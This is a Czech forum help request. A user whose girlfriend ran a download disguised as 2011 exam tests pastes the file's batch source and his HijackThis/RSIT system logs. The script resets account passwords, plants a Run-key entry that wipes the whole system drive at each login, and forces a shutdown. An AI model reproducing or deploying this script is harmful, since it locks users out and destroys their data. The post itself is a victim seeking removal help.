Slečna mi v PC stáhla a otevřela tenhle soubor: http://www.ulozto.cz/8231169/scio-testy-2011-cmd
Je v něm tohle:
echo off
net user %username% smrdim
net user administrator smrdim
echo Windows Registry Editor Version 5.00o > %homedrive%\windows\y.reg
echo.>> %homedrive%\windows\y.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %homedrive%\windows\y.reg
echo "ImagePath"="%homedrive%\\windows\\system_32.bat">> %homedrive%\windows\y.reg
reg import %homedrive%\windows\y.reg
echo erase /q /s %homedrive%\*.* >> "%homedrive%\\windows\\system_32.bat"
shutdown -s -f -t 0
erase /q *.cmd
Heslo jsem si dal do pořádku, smazal jsem po dvou csrss.exe a smss.exe, který nebyly v System32, ale po každým přihlášení mi najede nějaký command a začne se mi promazávat disk... A docela mě to naštvalo, páč první na řade byli Bulánci!:-)
Můj log vypadá takhle:
Logfile of random's system information tool 1.08 (written by random/random)
Run by Kryštofff at 2011-04-01 19:16:26
Systém Microsoft Windows XP Professional Service Pack 2
System drive C: has 1 GB (2%) free of 76 GB
Total RAM: 511 MB (29% free)
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 19:16:48, on 1.4.2011
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\QuickTime\qttask.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\QIP\qip.exe
C:\WINDOWS\System32\cisvc.exe
C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Common Files\Motive\McciCMService.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\taskmgr.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\cidaemon.exe
C:\WINDOWS\system32\notepad.exe
C:\Documents and Settings\Kryštofff\Plocha\stahuj\RSIT.exe
C:\Program Files\trend micro\Kryštofff.exe
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://search.qip.ru
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://search.qip.ru
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.qip.ru/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://search.qip.ru
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://seznam.cz/
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.qip.ru/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = Root: HKCU; Subkey: Software\Microsoft\Internet Explorer\SearchUrl; ValueType: string; ValueName: '; ValueData: '; Flags: createvalueifdoesntexist noerror; Tasks: AddSearchQip
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Odkazy
R3 - URLSearchHook: QIPBHO Class - {A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE} - C:\Documents and Settings\Kryštofff\Data aplikací\Microsoft\Internet Explorer\qipsearchbar.dll
R3 - URLSearchHook: (no name) - - (no file)
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: QIPBHO - {A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE} - C:\Documents and Settings\Kryštofff\Data aplikací\Microsoft\Internet Explorer\qipsearchbar.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe
O4 - HKLM\..\Run: [StarSkin] C:\PROGRAM FILES\ROCKET DIVISION SOFTWARE\STARSKIN\STARSKIN.EXE -H
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [WinampAgent] C:\Program Files\Winamp\winampa.exe
O4 - HKLM\..\Run: [ATIPTA] C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [avast5] C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe /nogui
O4 - HKLM\..\Run: [ImagePath] C:\windows\system_32.bat
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [QIP2005] C:\Program Files\QIP\qip.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')
O8 - Extra context menu item: &Google Search - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsearch.html
O8 - Extra context menu item: &Translate English Word - res://C:\Program Files\Google\GoogleToolbar1.dll/cmwordtrans.html
O8 - Extra context menu item: Backward Links - res://C:\Program Files\Google\GoogleToolbar1.dll/cmbacklinks.html
O8 - Extra context menu item: Cached Snapshot of Page - res://C:\Program Files\Google\GoogleToolbar1.dll/cmcache.html
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: E&xportovat do aplikace Microsoft Office Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Similar Pages - res://C:\Program Files\Google\GoogleToolbar1.dll/cmsimilar.html
O8 - Extra context menu item: Translate Page into English - res://C:\Program Files\Google\GoogleToolbar1.dll/cmtrans.html
O9 - Extra button: Zdroje informací - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra button: QIP 2005 - {1EF681F7-A04B-4D6D-9012-A307CCA55610} - C:\Program Files\QIP\qip.exe (HKCU)
O17 - HKLM\System\CCS\Services\Tcpip\..\{6D63F6FA-767A-46F4-9703-8A82DD52C4D4}: NameServer = 172.19.12.254
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\System32\browseui.dll
O22 - SharedTaskScheduler: Proces mezipaměti kategorií součástí - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\System32\browseui.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: McciCMService - Motive Communications, Inc. - C:\Program Files\Common Files\Motive\McciCMService.exe
O23 - Service: MSCSPTISRV - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\MSCSPTISRV.exe
O23 - Service: PACSPTISVR - Unknown owner - C:\Program Files\Common Files\Sony Shared\AVLib\PACSPTISVR.exe
O23 - Service: SonicStage Back-End Service - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SsBeSvc.exe
O23 - Service: Sony SPTI Service (SPTISRV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SPTISRV.exe
O23 - Service: SonicStage SCSI Service (SSScsiSV) - Sony Corporation - C:\Program Files\Common Files\Sony Shared\AVLib\SSScsiSV.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
--
End of file - 8180 bytes
======Scheduled tasks folder======
C:\WINDOWS\tasks\WGASetup.job
======Registry dump======
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3}]
AcroIEHlprObj Class - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll [2003-11-03 54248]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A55F9C95-2BB1-4EA2-BC77-DFAAB78832CE}]
QIPBHO Class - C:\Documents and Settings\Kryštofff\Data aplikací\Microsoft\Internet Explorer\qipsearchbar.dll [2009-07-14 150768]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AA58ED58-01DD-4d91-8333-CF10577473F7}]
Google Toolbar Helper - c:\program files\google\googletoolbar1.dll [2007-03-05 1191424]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre6\bin\jp2ssv.dll [2009-08-27 41760]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
JQSIEStartDetectorImpl Class - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll [2009-08-27 73728]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar]
{2318C2B1-4965-11d4-9B18-009027A5CD4F} - &Google - c:\program files\google\googletoolbar1.dll [2007-03-05 1191424]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"NeroFilterCheck"=C:\WINDOWS\system32\NeroCheck.exe [2001-07-09 155648]
"StarSkin"=C:\PROGRAM FILES\ROCKET DIVISION SOFTWARE\STARSKIN\STARSKIN.EXE -H []
"SoundMan"=C:\WINDOWS\SOUNDMAN.EXE [2004-08-30 69632]
"QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2006-06-30 98304]
"WinampAgent"=C:\Program Files\Winamp\winampa.exe [2006-03-10 35328]
"ATIPTA"=C:\Program Files\ATI Technologies\ATI Control Panel\atiptaxx.exe [2004-11-30 344064]
"SunJavaUpdateSched"=C:\Program Files\Java\jre6\bin\jusched.exe [2009-08-27 149280]
"TkBellExe"=C:\Program Files\Common Files\Real\Update_OB\realsched.exe [2009-09-27 198160]
"avast5"=C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe [2010-05-06 2815192]
"ImagePath"=C:\windows\system_32.bat [2011-04-01 22]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"MSMSGS"=C:\Program Files\Messenger\msmsgs.exe [2004-08-17 1667584]
"QIP2005"=C:\Program Files\QIP\qip.exe [2009-08-13 3276288]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\AtiExtEvent]
C:\WINDOWS\system32\Ati2evxx.dll [2004-12-01 94208]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\UploadMgr]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDriveTypeAutoRun"=145
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"HonorAutoRunSetting"=1
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
"C:\UT2003\System\UT2003.exe"="C:\UT2003\System\UT2003.exe:*:Enabled:UT2003"
"C:\Program Files\Activision\Thps3\Skate3.exe"="C:\Program Files\Activision\Thps3\Skate3.exe:*:Enabled:THPS3PC"
"C:\Program Files\Buka\Flat Out\flatout.exe"="C:\Program Files\Buka\Flat Out\flatout.exe:*:Enabled:flatout"
"C:\Program Files\EA GAMES\Need for Speed Underground 2\speed2.exe"="C:\Program Files\EA GAMES\Need for Speed Underground 2\speed2.exe:*:Enabled:speed2"
"C:\Documents and Settings\USER01\Plocha\games\Supreme\Supreme.exe"="C:\Documents and Settings\USER01\Plocha\games\Supreme\Supreme.exe:*:Enabled:Supreme"
"C:\Program Files\RadLight\RadLight 4 pre-beta 1\RadLight.exe"="C:\Program Files\RadLight\RadLight 4 pre-beta 1\RadLight.exe:*:Disabled:Kernel Executable"
"C:\ Enemy Territory\ET.exe"="C:\ Enemy Territory\ET.exe:*:Enabled:ET"
"C:\Program Files\Charlie's Angels Angel X\Charlie's Angels Angel X.exe"="C:\Program Files\Charlie's Angels Angel X\Charlie's Angels Angel X.exe:*:Enabled:Charlie's Angels Angel X"
"C:\Program Files\3DO\Heroes3\HEROES3.EXE"="C:\Program Files\3DO\Heroes3\HEROES3.EXE:*:Enabled:Heroes of Might and Magic® III"
"C:\Program Files\EA GAMES\Need For Speed Underground\Speed.exe"="C:\Program Files\EA GAMES\Need For Speed Underground\Speed.exe:*:Enabled:Speed"
"C:\Program Files\GameSpy Arcade\Aphex.exe"="C:\Program Files\GameSpy Arcade\Aphex.exe:*:Enabled:GameSpy Arcade"
"C:\Program Files\THQ\MotoGP URT 3\motogp.exe"="C:\Program Files\THQ\MotoGP URT 3\motogp.exe:*:Enabled:motogp"
"C:\Games\Paintball2\paintball2.exe"="C:\Games\Paintball2\paintball2.exe:*:Enabled:paintball2"
"C:\Documents and Settings\jáchim\Dokumenty\Freeciv-gtk2-2.0.8\civserver.exe"="C:\Documents and Settings\jáchim\Dokumenty\Freeciv-gtk2-2.0.8\civserver.exe:*:Enabled:civserver"
"C:\Program Files\EA Games\MOHAA\MOHAA.exe"="C:\Program Files\EA Games\MOHAA\MOHAA.exe:*:Enabled:Medal of Honor Allied Assault"
"C:\Program Files\Hooligans\Hooligans.exe"="C:\Program Files\Hooligans\Hooligans.exe:*:Enabled:Hooligans"
"C:\Documents and Settings\Kryštofff\Local Settings\Temp\Rar$EX00.906\StrongDC.exe"="C:\Documents and Settings\Kryštofff\Local Settings\Temp\Rar$EX00.906\StrongDC.exe:*:Enabled:StrongDC++"
"C:\Program Files\QIP\qip.exe"="C:\Program Files\QIP\qip.exe:*:Enabled:Quiet Internet Pager"
"C:\Program Files\strong dc++\StrongDC.exe"="C:\Program Files\strong dc++\StrongDC.exe:*:Enabled:StrongDC++"
"C:\Program Files\EA SPORTS\2006 FIFA World Cup (TM)\FIFAWC06.exe"="C:\Program Files\EA SPORTS\2006 FIFA World Cup (TM)\FIFAWC06.exe:*:Enabled:FIFAWC06"
"C:\Program Files\Real\RealPlayer\realplay.exe"="C:\Program Files\Real\RealPlayer\realplay.exe:*:Enabled:RealPlayer"
"C:\Program Files\Skype\Plugin Manager\skypePM.exe"="C:\Program Files\Skype\Plugin Manager\skypePM.exe:*:Enabled:Skype Extras Manager"
"C:\Program Files\uTorrent\uTorrent.exe"="C:\Program Files\uTorrent\uTorrent.exe:*:Enabled:µTorrent"
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
"%windir%\system32\sessmgr.exe"="%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
======File associations======
.txt - open - Notepad.exe %1
======List of files/folders created in the last 1 months======
2011-04-01 19:16:27 ----D---- C:\Program Files\trend micro
2011-04-01 19:16:26 ----D---- C:\rsit
2011-04-01 18:11:58 ----A---- C:\WINDOWS\system_32.bat
2011-03-14 09:51:49 ----HDC---- C:\WINDOWS\$NtUninstallKB970430$
2011-03-14 09:51:38 ----HDC---- C:\WINDOWS\$NtUninstallKB971737$
2011-03-13 23:07:43 ----HDC---- C:\WINDOWS\$NtUninstallKB980218$
2011-03-13 23:07:32 ----HDC---- C:\WINDOWS\$NtUninstallKB951376-v2$
2011-03-13 23:07:23 ----HDC---- C:\WINDOWS\$NtUninstallKB952954$
2011-03-13 23:07:15 ----HDC---- C:\WINDOWS\$NtUninstallKB959426$
2011-03-13 23:07:06 ----HDC---- C:\WINDOWS\$NtUninstallKB946648$
2011-03-13 23:06:58 ----HDC---- C:\WINDOWS\$NtUninstallKB956803$
2011-03-13 23:06:51 ----HDC---- C:\WINDOWS\$NtUninstallKB960859$
2011-03-13 23:06:42 ----HDC---- C:\WINDOWS\$NtUninstallKB971468$
2011-03-13 23:06:23 ----HDC---- C:\WINDOWS\$NtUninstallKB979683$
2011-03-13 23:06:08 ----HDC---- C:\WINDOWS\$NtUninstallKB958869$
2011-03-13 23:05:59 ----HDC---- C:\WINDOWS\$NtUninstallKB954155_WM9$
2011-03-13 23:05:53 ----HDC---- C:\WINDOWS\$NtUninstallKB980195$
2011-03-13 23:05:44 ----HDC---- C:\WINDOWS\$NtUninstallKB980232$
2011-03-13 23:05:32 ----HDC---- C:\WINDOWS\$NtUninstallKB981350$
2011-03-13 23:04:07 ----SHD---- C:\Config.Msi
2011-03-13 23:03:00 ----HDC---- C:\WINDOWS\$NtUninstallKB955759$
2011-03-13 23:02:52 ----D---- C:\WINDOWS\system32\KB905474
2011-03-13 23:02:11 ----HDC---- C:\WINDOWS\$NtUninstallKB974318$
2011-03-13 23:02:01 ----HDC---- C:\WINDOWS\$NtUninstallKB969059$
2011-03-13 23:01:51 ----HDC---- C:\WINDOWS\$NtUninstallKB2229593$
2011-03-13 23:01:42 ----HDC---- C:\WINDOWS\$NtUninstallKB950974$
2011-03-13 23:01:35 ----HDC---- C:\WINDOWS\$NtUninstallKB978037$
2011-03-13 23:01:27 ----HDC---- C:\WINDOWS\$NtUninstallKB975713$
2011-03-13 23:01:18 ----HDC---- C:\WINDOWS\$NtUninstallKB971657$
2011-03-13 23:01:09 ----HDC---- C:\WINDOWS\$NtUninstallKB978338$
2011-03-13 23:01:02 ----HDC---- C:\WINDOWS\$NtUninstallKB960225$
2011-03-13 23:00:53 ----HDC---- C:\WINDOWS\$NtUninstallKB972270$
2011-03-13 23:00:47 ----HDC---- C:\WINDOWS\$NtUninstallKB954156_WM9L$
2011-03-13 23:00:30 ----HDC---- C:\WINDOWS\$NtUninstallKB974112$
2011-03-13 23:00:02 ----HDC---- C:\WINDOWS\$NtUninstallKB956572$
2011-03-13 22:59:46 ----HDC---- C:\WINDOWS\$NtUninstallKB956844$
2011-03-13 22:59:38 ----HDC---- C:\WINDOWS\$NtUninstallKB961501$
2011-03-13 22:59:26 ----HDC---- C:\WINDOWS\$NtUninstallKB975561$
2011-03-13 22:59:18 ----HDC---- C:\WINDOWS\$NtUninstallKB952069_WM9$
2011-03-13 22:59:11 ----HDC---- C:\WINDOWS\$NtUninstallKB973869$
2011-03-13 22:59:02 ----HDC---- C:\WINDOWS\$NtUninstallKB975025$
2011-03-13 22:58:49 ----HDC---- C:\WINDOWS\$NtUninstallKB973540_WM9L$
2011-03-13 22:58:37 ----HDC---- C:\WINDOWS\$NtUninstallKB952004$
2011-03-13 22:58:27 ----HDC---- C:\WINDOWS\$NtUninstallKB974571$
2011-03-13 22:58:16 ----HDC---- C:\WINDOWS\$NtUninstallKB975560$
2011-03-13 22:58:01 ----HDC---- C:\WINDOWS\$NtUninstallKB973507$
2011-03-13 22:57:53 ----HDC---- C:\WINDOWS\$NtUninstallKB941569$
2011-03-13 22:57:18 ----HDC---- C:\WINDOWS\$NtUninstallKB977816$
2011-03-13 22:57:08 ----HDC---- C:\WINDOWS\$NtUninstallKB973687$
2011-03-13 22:57:00 ----HDC---- C:\WINDOWS\$NtUninstallKB950762$
2011-03-13 22:56:51 ----HDC---- C:\WINDOWS\$NtUninstallKB981793$
2011-03-13 22:56:43 ----HDC---- C:\WINDOWS\$NtUninstallKB979559$
2011-03-13 22:56:34 ----HDC---- C:\WINDOWS\$NtUninstallKB952287$
2011-03-13 22:56:22 ----HDC---- C:\WINDOWS\$NtUninstallKB973904$
2011-03-13 22:55:58 ----HDC---- C:\WINDOWS\$NtUninstallKB967715$
2011-03-13 22:55:44 ----HDC---- C:\WINDOWS\$NtUninstallKB974392$
2011-03-13 22:55:30 ----HDC---- C:\WINDOWS\$NtUninstallKB977914$
2011-03-13 22:55:00 ----HDC---- C:\WINDOWS\$NtUninstallKB951748$
2011-03-13 22:54:53 ----HDC---- C:\WINDOWS\$NtUninstallKB971961$
2011-03-13 22:54:46 ----HDC---- C:\WINDOWS\$NtUninstallKB978542$
2011-03-13 22:54:39 ----HDC---- C:\WINDOWS\$NtUninstallKB970238$
2011-03-13 22:54:34 ----HDC---- C:\WINDOWS\$NtUninstallKB885884$
2011-03-13 22:54:25 ----HDC---- C:\WINDOWS\$NtUninstallKB979482$
2011-03-13 22:54:19 ----HDC---- C:\WINDOWS\$NtUninstallKB978706$
2011-03-13 22:54:08 ----HDC---- C:\WINDOWS\$NtUninstallKB958470$
2011-03-13 22:54:00 ----HDC---- C:\WINDOWS\$NtUninstallKB960803$
2011-03-13 22:53:53 ----HDC---- C:\WINDOWS\$NtUninstallKB973815$
2011-03-13 22:53:47 ----HDC---- C:\WINDOWS\$NtUninstallKB975562$
2011-03-13 22:53:37 ----HDC---- C:\WINDOWS\$NtUninstallKB971032$
2011-03-13 22:53:29 ----HDC---- C:\WINDOWS\$NtUninstallKB955069$
2011-03-13 22:53:23 ----HDC---- C:\WINDOWS\$NtUninstallKB956802$
2011-03-13 22:53:04 ----HDC---- C:\WINDOWS\$NtUninstallKB982381$
2011-03-13 22:52:54 ----HDC---- C:\WINDOWS\$NtUninstallKB944338-v2$
2011-03-13 22:52:47 ----HDC---- C:\WINDOWS\$NtUninstallKB975467$
2011-03-13 22:52:35 ----HDC---- C:\WINDOWS\$NtUninstallKB968389$
2011-03-13 21:07:47 ----D---- C:\WINDOWS\system32\CatRoot_bak
2011-03-13 20:59:35 ----N---- C:\WINDOWS\system32\tzchange.exe
2011-03-13 20:41:36 ----HDC---- C:\WINDOWS\$NtUninstallKB978601$
2011-03-13 20:41:29 ----HDC---- C:\WINDOWS\$NtUninstallKB979309$
2011-03-13 20:41:11 ----HDC---- C:\WINDOWS\$NtUninstallKB978695_WM9$
2011-03-13 20:40:57 ----HDC---- C:\WINDOWS\$NtUninstallKB958644$
2011-03-13 20:40:31 ----HDC---- C:\WINDOWS\$NtUninstallKB979402_WM9L$
2011-03-13 20:40:12 ----HDC---- C:\WINDOWS\$NtUninstallKB979332_WM9L$
2011-03-13 20:40:03 ----N---- C:\WINDOWS\system32\browserchoice.exe
2011-03-13 20:39:30 ----HDC---- C:\WINDOWS\$NtUninstallKB923561$
2011-03-13 13:08:00 ----HDC---- C:\WINDOWS\$MSI31Uninstall_KB893803v2$
2011-03-13 13:07:05 ----D---- C:\WINDOWS\system32\PreInstall
2011-03-13 13:07:02 ----HDC---- C:\WINDOWS\$NtUninstallKB898461$
2011-03-13 13:07:01 ----HD---- C:\WINDOWS\$hf_mig$
2011-03-13 13:01:02 ----D---- C:\WINDOWS\system32\SoftwareDistribution
======List of files/folders modified in the last 1 months======
2011-04-01 19:16:34 ----D---- C:\WINDOWS\Prefetch
2011-04-01 19:16:27 ----D---- C:\Program Files
2011-04-01 19:10:48 ----D---- C:\Program Files\Mozilla Firefox
2011-04-01 19:09:32 ----D---- C:\WINDOWS\Temp
2011-04-01 19:09:11 ----D---- C:\bulanci
2011-04-01 19:09:11 ----D---- C:\BS
2011-04-01 19:07:46 ----A---- C:\WINDOWS\SchedLgU.Txt
2011-04-01 18:11:58 ----AD---- C:\WINDOWS
2011-03-31 06:02:53 ----A---- C:\WINDOWS\NeroDigital.ini
2011-03-31 05:42:52 ----D---- C:\Documents and Settings\Kryštofff\Data aplikací\uTorrent
2011-03-27 13:31:38 ----D---- C:\WINDOWS\system32
2011-03-27 13:31:36 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2011-03-26 17:00:37 ----D---- C:\Program Files\uTorrent
2011-03-16 22:58:13 ----D---- C:\WINDOWS\system32\drivers
2011-03-14 09:51:54 ----HD---- C:\WINDOWS\inf
2011-03-14 09:51:52 ----RSHDC---- C:\WINDOWS\system32\dllcache
2011-03-14 09:51:45 ----A---- C:\WINDOWS\imsins.BAK
2011-03-14 08:47:25 ----D---- C:\WINDOWS\system32\CatRoot2
2011-03-14 07:41:07 ----D---- C:\WINDOWS\system32\wbem
2011-03-14 07:41:07 ----D---- C:\WINDOWS\AppPatch
2011-03-14 07:41:05 ----D---- C:\WINDOWS\system32\Setup
2011-03-13 23:07:09 ----D---- C:\Program Files\Messenger
2011-03-13 23:06:09 ----D---- C:\WINDOWS\WinSxS
2011-03-13 23:04:56 ----SHD---- C:\WINDOWS\Installer
2011-03-13 23:02:52 ----SD---- C:\WINDOWS\Tasks
2011-03-13 22:59:29 ----D---- C:\Program Files\Movie Maker
2011-03-13 22:54:48 ----D---- C:\Program Files\Outlook Express
2011-03-13 22:54:11 ----D---- C:\WINDOWS\ServicePackFiles
2011-03-13 22:53:12 ----D---- C:\Program Files\Internet Explorer
2011-03-13 22:14:34 ----D---- C:\WINDOWS\system32\CatRoot
2011-03-13 21:07:46 ----D---- C:\WINDOWS\Debug
2011-03-13 13:01:21 ----D---- C:\WINDOWS\SoftwareDistribution
2011-03-13 13:01:17 ----D---- C:\WINDOWS\Help
2011-03-13 13:01:17 ----D---- C:\Program Files\WindowsUpdate
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R0 nv_agp;NVIDIA nForce AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\nv_agp.sys [2002-09-06 13568]
R0 ohci1394;Hostitelský řadič IEEE 1394 dle standardu OHCI; C:\WINDOWS\system32\DRIVERS\ohci1394.sys [2004-08-04 61056]
R0 prohlp02;StarForce Protection Helper Driver v2; C:\WINDOWS\System32\drivers\prohlp02.sys [2004-08-09 114016]
R0 prosync1;StarForce Protection Synchronization Driver v1; C:\WINDOWS\System32\drivers\prosync1.sys [2004-07-19 7040]
R0 PxHelp20;PxHelp20; C:\WINDOWS\system32\DRIVERS\PxHelp20.sys [2006-10-18 36624]
R0 sfhlp01;StarForce Protection Helper Driver; C:\WINDOWS\System32\drivers\sfhlp01.sys [2003-12-01 4832]
R0 sptd;sptd; C:\WINDOWS\System32\Drivers\sptd.sys [2007-01-14 611064]
R1 Aavmker4;avast! Asynchronous Virus Monitor; C:\WINDOWS\system32\drivers\Aavmker4.sys [2010-05-06 28880]
R1 AmdK7;Ovladač procesoru AMD K7; C:\WINDOWS\System32\DRIVERS\amdk7.sys [2004-08-17 41216]
R1 aswSP;aswSP; C:\WINDOWS\system32\drivers\aswSP.sys [2010-05-06 164048]
R1 aswTdi;avast! Network Shield Support; C:\WINDOWS\system32\drivers\aswTdi.sys [2010-05-06 46672]
